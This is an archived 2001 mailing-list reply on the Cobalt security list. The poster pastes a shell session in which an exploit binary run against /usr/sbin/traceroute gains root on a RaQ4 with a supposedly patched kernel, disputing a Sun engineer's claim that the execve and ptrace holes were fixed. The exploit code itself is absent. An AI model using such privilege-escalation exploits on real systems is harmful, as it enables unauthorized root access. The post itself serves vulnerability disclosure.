[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-security] RaQ4-All-Kernel-1.0.1-2.216C24III.pkg

Subject: Re: [cobalt-security] RaQ4-All-Kernel-1.0.1-2.216C24III.pkg
From: Peter Batenburg <peter@xxxxxxxxxx>
Date: Thu, 26 Apr 2001 19:21:32 +0200
List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>

[admin@xx10 admin]$ ./prak /usr/sbin/traceroute
bug exploited successfully.
enjoy!
bash# id

bash# uid=0(root) gid=0(root)groups=27(admin),10(wheel),110(home),111(site-adm)

bash# uname -a

bash# Linux xx10.test.nl 2.2.16C24_III #1 Thu Mar 22 21:17:39 PST 2001 i586unknown

bash#

Yeah, i see its fixed.

At 09:32 26-4-2001 -0700, you wrote:

On Thu, 26 Apr 2001, Dennis Koster wrote:

> All kernels below the 2.2.19 are rootable
> So we want 2.2.19 or higher (If it was up to me I would go for a 2.4.x one)

The patches from 2.2.19 were rolled back into our kernel tree.  The
execve and ptrace vulnerabilities were addressed in this kernel release.

Version numbers rarely tell the entire story.

Jeff
--
Jeff Lovell
Sun Microsystems
Server Appliance Business Unit

Follow-Ups:
- Re: [cobalt-security] RaQ4-All-Kernel-1.0.1-2.216C24III.pkg
  - From: Jeff Lovell

References:
- Re: [cobalt-security] RaQ4-All-Kernel-1.0.1-2.216C24III.pkg
  - From: Dennis Koster
- [cobalt-security] RaQ4-All-Kernel-1.0.1-2.216C24III.pkg
  - From: Miro Majcen
- Re: [cobalt-security] RaQ4-All-Kernel-1.0.1-2.216C24III.pkg
  - From: Jeff Lovell

Prev by Date: Re: [cobalt-security] RaQ4-All-Kernel-1.0.1-2.216C24III.pkg
Next by Date: Re: [cobalt-security] Antivirus?
Previous by thread: Re: [cobalt-security] RaQ4-All-Kernel-1.0.1-2.216C24III.pkg
Next by thread: Re: [cobalt-security] RaQ4-All-Kernel-1.0.1-2.216C24III.pkg

Sun Cobalt Security Message Index

Sun Cobalt Security Thread Index